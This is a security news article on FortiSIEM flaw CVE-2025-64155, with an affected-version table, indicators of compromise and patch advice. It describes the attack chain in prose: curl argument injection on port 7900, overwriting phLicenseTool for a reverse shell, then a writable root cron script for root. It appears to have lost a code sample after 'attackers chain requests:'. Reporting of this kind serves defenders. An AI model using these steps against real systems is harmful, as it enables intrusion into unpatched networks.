In August 2025, Fortinet issued an advisory for CVE-2025-25256, an OS command injection vulnerability (CWE-78) in FortiSIEM that exposed the platform to unauthenticated remote code execution via crafted CLI requests.
Practical exploits surfaced in the wild, prompting security firm Horizon3.ai to conduct a deep investigation. Their analysis uncovered a devastating chain: an unauthenticated argument injection vulnerability enabling arbitrary file writes and RCE as the admin user, paired with a file overwrite privilege escalation to root access.
Fortinet assigned these CVE-2025-64155 under FG-IR-25-772. A proof-of-concept exploit is available on GitHub.
This marks another chapter in FortiSIEM’s vulnerability saga for Horizon3.ai researchers, who have dissected the platform for years. Prior disclosures include CVE-2023-34992 (phMonitor command injection) and CVE-2024-23108 (second-order injection), detailed in their deep dives.
Although not listed in CISA’s Known Exploited Vulnerabilities catalog, leaked Black Basta ransomware chats from earlier in 2025 referenced these flaws, indicating threat actor interest.
FortiSIEM Architecture and phMonitor Exposure
FortiSIEM supports varied deployments: all-in-one servers or supervisor-collector models, where the phMonitor service handles inter-role communication over TCP/IP port 7900.
This service processes custom API messages without authentication, mapping commands to handlers via integers in phMonitorProcess::initEventHandler. Past hardening reduced exposure, but vulnerabilities persist.
CVE-2025-64155 targets handleStorageRequest with “elastic” storage type. User-controlled XML tags like cluster_name and cluster_url feed into /opt/phoenix/phscripts/bin/elastic_test_url.sh.
Despite subprocess.run() wrappers and wrapShellToken escaping, the script’s curl invocation via execve allows argument injection.
By leveraging curl’s obscure –next flag, attackers chain requests:
This overwrites phLicenseTool executed every few seconds as a reverse shell, yielding admin access.
| Version | Affected | Solution |
|---|---|---|
| 7.4 | Not affected | N/A |
| 7.3 | 7.3.0-7.3.1 | Upgrade to 7.3.2+ |
| 7.2 | 7.2.0-7.2.5 | Upgrade to 7.2.6+ |
| 7.1 | 7.1.0-7.1.7 | Upgrade to 7.1.8+ |
| 7.0 | 7.0.0-7.0.3 | Upgrade to 7.0.4+ |
| 6.7 | 6.7.0-6.7.9 | Upgrade to 6.7.10+ |
| 6.6 and below | All versions | Migrate to fixed release |
Admin shells pave the way to root via cronjob abuse. The root crontab /etc/cron.d/fsm-crontab runs /opt/charting/redishb.sh every minute, writable by admin despite root execution. Overwriting it with a payload grants full compromise.
Indicators of Compromise
Monitor /opt/phoenix/log/phoenix.logs for PHL_ERROR entries logging elastic_test_url.sh abuse, including malicious URLs and target files (e.g., phLicenseTool overwrites).
Fortinet urges upgrades and port 7900 restrictions. Organizations should audit logs and patch immediately amid rising SIEM targeting.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
